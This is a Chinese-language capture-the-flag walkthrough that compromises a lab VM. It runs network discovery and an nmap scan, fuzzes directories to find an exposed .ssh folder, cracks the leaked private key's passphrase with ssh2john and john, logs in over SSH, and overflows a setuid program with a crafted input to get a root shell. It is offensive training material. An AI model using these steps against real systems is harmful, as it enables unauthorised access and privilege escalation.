笔记篇 SSH密钥泄露&&提权&&溢出&&服务发现

首先启动我们的靶机和KALI(需要靶机环境请在本篇留言或私信作者)

首先在KALI输入ifconfig查看网段

此处为80网段

接着输入

netdiscover -r 192.168.80.1/24 <IP/子网掩码>

除去192.168.80.1网关和192.168.80.2我们对剩下的进行ping检测

192.168.80.254丢包

192.168.80.149存活

我们对192.168.80.149进行服务发现

nmap -sV 192.168.80.149

结果开放端口为22/80/31337，我们对31337端口进行渗透

在浏览器输入

http://192.168.80.149:31337

提示Not Found错误，推测存在隐藏页，我们使用dirb工具对网站目录进行FUZZ

得到以下路径

---- Scanning URL: http://192.168.80.149:31337/ ----+ http://192.168.80.149:31337/.bash_history (CODE:200|SIZE:19)                    + http://192.168.80.149:31337/.bashrc (CODE:200|SIZE:3526)                        + http://192.168.80.149:31337/.profile (CODE:200|SIZE:675)                        + http://192.168.80.149:31337/.ssh (CODE:200|SIZE:43)                             + http://192.168.80.149:31337/robots.txt (CODE:200|SIZE:70)                       

我们先访问robots.txt(搜索引擎检索文件)

接着访问taxes，得到flag1

然后我们访问.ssh,发现泄露的私钥，我们保存下来

http://192.168.80.149:31337/.ssh/id_rshttp://192.168.80.149:31337/.ssh/authorized_keys

我们把私钥copy到KALI，使用ssh2john将id_rsa转换为可识别的信息

ssh2john id_rsa > 123

我们使用字典对转换后的信息进行破解

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules 123

得到密码starwars

我们打开authorized_keys，看到最后的ssh用户名simon

我们进行连接

ssh -i id_rsa simon@192.168.80.149

把刚刚破解的密码输进去

成功进入系统，然后我们cd到root目录

发现flag.txt但是没有权限打开，我们查看read_message.c文件

代码审计后发现可以进行溢出后提权

运行read_message后输入SimonAAAAAAAAAAAAAAA/bin/sh使其溢出后跳转至/bin/sh

成功提权，拿到flag3{das_bof_meister}

​